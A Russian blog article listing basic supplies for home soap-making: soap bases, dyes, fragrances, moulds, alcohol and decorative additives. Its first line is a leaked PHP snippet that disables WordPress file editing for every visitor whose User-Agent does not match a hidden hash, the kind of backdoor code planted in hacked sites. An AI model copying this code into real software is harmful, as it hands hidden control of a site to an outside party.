if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Основные материалы, которые необходимы для мыловарения | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Основные материалы, которые необходимы для мыловарения

Как и в любом другом производстве для мыловарения пусть даже в домашних условиях не обойтись без материалов и инструментов, которые потребуются для создания маленьких и неповторимых шедевров

Как и в любом дру­гом про­из­вод­стве для мыло­ва­ре­ния пусть даже в домаш­них усло­ви­ях не обой­тись без мате­ри­а­лов и инстру­мен­тов, кото­рые потре­бу­ют­ся для созда­ния малень­ких и непо­вто­ри­мых шедев­ров. Поэто­му все, кто хоть раз заду­мы­вал­ся о том, что­бы попро­бо­вать изго­тов­ле­ние мыла в домаш­них усло­ви­ях, потре­бу­ет­ся при­об­ре­сти не толь­ко ингре­ди­ен­ты буду­ще­го мыла, но и так­же необ­хо­ди­мые инструменты.

В мага­зи­нах для хоб­би и руко­де­лия для мыло­ва­ре­ния пред­став­лен огром­ный ассор­ти­мент все­воз­мож­ных бано­чек, паке­ти­ков с раз­лич­ным напол­не­ни­ем. Разо­брать­ся во всем этом, опи­сать каж­дый мате­ри­ал и его назна­че­ние может не каж­дый спе­ци­а­лист с огром­ным опы­том рабо­ты. А у начи­на­ю­щих и вооб­ще гла­за раз­бе­га­ют­ся от коли­че­ства пред­став­лен­ной продукции.

Для того что­бы помочь нович­кам осво­ить этот уни­каль­ный и инте­рес­ный вид вре­мя­пре­про­вож­де­ния, как сде­лать мыло сво­и­ми рука­ми, а сво­их род­ных и близ­ких поба­ло­вать инди­ви­ду­аль­ны­ми подар­ка­ми, в этой ста­тье при­ве­ден спи­сок основ­ных мате­ри­а­лов, без кото­рых невоз­мож­но сде­лать кра­си­вое мыло, и необ­хо­ди­мых инстру­мен­тов, кото­рые обя­за­тель­но потре­бу­ют­ся при работе.

1_1
Сам пер­во­ис­точ­ник, осно­ва основ буду­ще­го мыла – это твер­дая мыль­ная осно­ва. Этот мате­ри­ал быва­ет раз­лич­ным не толь­ко по про­из­во­ди­те­лю, но и по само­му виду. Мыль­ная осно­ва быва­ет: орга­ни­че­ской блед­но-жел­то­го цве­та, про­зрач­ная и белая. Позд­нее, при­ду­мы­вая новый дизайн мыла, при­дет чет­кое пони­ма­ние какой вид осно­вы потре­бу­ет­ся. Но для домаш­не­го мыло­ва­ре­ния для начи­на­ю­щих сле­ду­ет запа­стись одним или дву­мя кило­грам­ма­ми про­зрач­ной мыль­ной осно­вы и таким же коли­че­ством белой. Кста­ти тако­го коли­че­ства осно­вы хва­та­ет в сред­нем на 30 – 40 кус­ков гото­во­го мыла.

Осно­ва пред­став­ле­на в точ­ках про­да­жи прак­ти­че­ски всех про­из­во­ди­те­лей: начи­ная от Китая и Малай­зии, и закан­чи­вая евро­пей­ски­ми стра­на­ми: Гер­ма­ни­ей, Бель­ги­ей. Есть и на рос­сий­ском рын­ке мыль­ная осно­ва оте­че­ствен­но­го про­из­вод­ства. Опыт­ные мыло­ва­ры пред­по­чи­та­ют и поль­зу­ют­ся англий­ской осно­вой. Но неко­то­рые под­дер­жи­ва­ют оте­че­ствен­но­го про­из­во­ди­те­ля, тем более что этот мате­ри­ал, непло­хо себя зарекомендовал.

Про ази­ат­ские осно­вы есть нема­ло как отри­ца­тель­ных, так и поло­жи­тель­ных отзывов.
1_2
Необ­хо­ди­мо так­же при­об­ре­сти кра­си­те­ли для при­да­ния нуж­но­го оттен­ка буду­ще­му про­дук­ту. Все мно­го­об­ра­зие палит­ры сра­зу же при­об­ре­сти не полу­чит­ся, поэтом на пер­во­на­чаль­ном эта­пе набор мыло­ва­ре­ния для начи­на­ю­щих мож­но огра­ни­чить покуп­кой кра­си­те­лей трех цве­тов: жел­тый, крас­ный, синий. Это основ­ные цве­та, кото­рые исполь­зу­ют­ся в боль­шин­стве цвет­ных теле­ви­зи­он­ной и орг­тех­ни­ке. Все осталь­ные оттен­ки полу­ча­ет­ся в резуль­та­те сме­ши­ва­ния этих трех цве­тов в раз­лич­ной пропорции.

Так, напри­мер, для созда­ния зеле­но­го цве­та необ­хо­ди­мо сме­шать жел­тый и синий, а фио­ле­то­вый полу­чит­ся при сме­ши­ва­нии крас­но­го и сине­го цве­тов. Впо­след­ствии, что­бы не тра­тить вре­мя на поиск тре­бу­е­мо­го оттен­ка, мож­но будет при­об­ре­сти и дру­гие люби­мые, часто исполь­зу­е­мые цве­та. Или посмот­ри­те таб­ли­цу сме­ши­ва­ния цветов.
1_3
Набор для мыло­ва­ре­ни­я­не­об­хо­ди­мо так­же попол­нить и все­воз­мож­ны­ми отдуш­ка­ми, кото­рые поз­во­ля­ют при­дать мылу непо­вто­ри­мый запах. Для это­го в мыло­ва­ре­нии исполь­зу­ют­ся нату­раль­ные эфир­ные мас­ла и син­те­ти­че­ские аро­ма­ти­за­то­ры. Их глав­ное отли­чие, что одни полу­ча­ют­ся из рас­те­ний, дру­гие полу­че­ны искус­ствен­ным путем.

Для умень­ше­ния син­те­ти­че­ских соеди­не­ний, как пра­ви­ло, исполь­зу­ют нату­раль­ные эфир­ные мас­ла. Но ино­гда хочет­ся сде­лать мыло в домаш­них усло­ви­ях запа­хом моро­жен­но­го ил арбу­за, кото­рые невоз­мож­но добыть из растений.

Для нача­ла мож­но купить пару фла­кон­чи­ков эфир­ных масел и столь­ко же син­те­ти­че­ских аро­ма­ти­за­то­ров. Если покуп­ка про­ис­хо­дит в реаль­ном мага­зине, то ори­ен­ти­ро­вать­ся мож­но на свой соб­ствен­ный нос. Но при зака­зе таких това­ров через интер­нет луч­ше ори­ен­ти­ро­вать­ся на зна­ко­мые запа­хи: роза, лаван­да, мята, апельсин.
1_4
Посколь­ку для изго­тов­ле­ния мыла потре­бу­ет­ся рас­пла­вить мыль­ную осно­ву, а впо­след­ствии при­дать ей нуж­ную фор­му, то в набор мыло­ва­ре­ния для начи­на­ю­щих, долж­ны вхо­дить и раз­но­об­раз­ные фор­мы для при­да­нию мылу его буду­щей кон­фи­гу­ра­ции. На пер­вом эта­пе это могут быть одно­ра­зо­вая пла­сти­ко­вая посу­да или раз­лич­ные упа­ков­ки из-под кос­ме­ти­че­ских средств, но гораз­до эсте­тич­нее будет выгля­деть мыло, застыв­шее в спе­ци­аль­ной фор­ме. После при­об­ре­те­ния основ­ных навы­ков мож­но будет попро­бо­вать сде­лать уни­каль­ную фор­му для мыла сво­и­ми руками.
1_5
Кро­ме того, для созда­ния мыла потре­бу­ет­ся и эти­ло­вый спирт, кото­рый сей­час непро­сто най­ти. При самом счаст­ли­вом сте­че­нии обсто­я­тельств мож­но при­об­ре­сти пузы­рек объ­е­мом 100 мл в апте­ке под назва­ни­ем «Меди­цин­ский асеп­ти­че­ский рас­твор». В соста­ве обя­за­тель­но долж­но быть содер­жа­ние 95% эти­ло­во­го спир­та. В про­тив­ном слу­чае надо заво­дить зна­ком­ства с меди­ка­ми, так как спирт явля­ет­ся очень важ­ной состав­ля­ю­щей буду­ще­го мыла. Сре­ди послед­ствий мож­но отме­тить, рас­сла­и­ва­ние мыла, мно­же­ство пузырь­ков на поверх­но­сти. В допол­не­ние к спир­ту потре­бу­ет­ся пульверизатор.
1_6
Кро­ме того потре­бу­ет­ся тара, где мыло будет пла­вить­ся и инстру­мен­ты для поме­ши­ва­ния, в каче­стве кото­рых мож­но вос­поль­зо­вать­ся пла­сти­ко­вы­ми одно­ра­зо­вы­ми лож­ка­ми или палоч­ка­ми для еды из япон­ско­го или китай­ско­го ресторана.

Перед тем как варить мыло руч­ной рабо­ты необ­хо­ди­мо так­же запа­стись и допол­ни­тель­ны­ми мело­ча­ми, кото­рые укра­сят буду­щий продукт.
1_8
1. Глит­тер, мика и дру­гие бле­стя­щие вкрап­ле­ния раз­ли­ча­ют­ся раз­ме­ром бле­стя­щих частиц: наи­бо­лее мел­кие части­цы у мики, у глит­те­ра части­цы име­ют более круп­ный раз­мер. Этот ингре­ди­ент исполь­зу­ет­ся не толь­ко в домаш­нем мыло­ва­ре­нии для начи­на­ю­щих, но для это­го про­из­вод­ства его тре­бу­ет­ся очень малень­кое коли­че­ство. Поэто­му его целе­со­об­раз­нее поку­пать в самой мел­кой фасовке.
1_9
2. Сухие цве­ты и тра­вы для деко­ра, а неко­то­рые из них будут обла­дать отше­лу­ши­ва­ю­щим эффектом.
1_10
3. При­род­ная мочал­ка, кото­рая носит назва­ние люфа. Мыло с такой встав­кой будет обла­дать мас­саж­ным свойством.
1_11
4. Для допол­ни­тель­но­го укра­ше­ния мыла мож­но исполь­зо­вать так­же и суше­ные доль­ки апель­си­нов или палоч­ки корицы.
1_12
5. Для созда­ния мыла-скра­ба при­го­дят­ся твер­дые порош­ки такие как, моло­тый кофе, кон­ди­тер­ский мак, коко­со­вая струж­ка, поро­шок пем­зы – все, что обла­да­ет эффек­том скраба.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Voronixa

Все же люблю я мыловарение... Очень! За волшебство! Читайте все мои записи!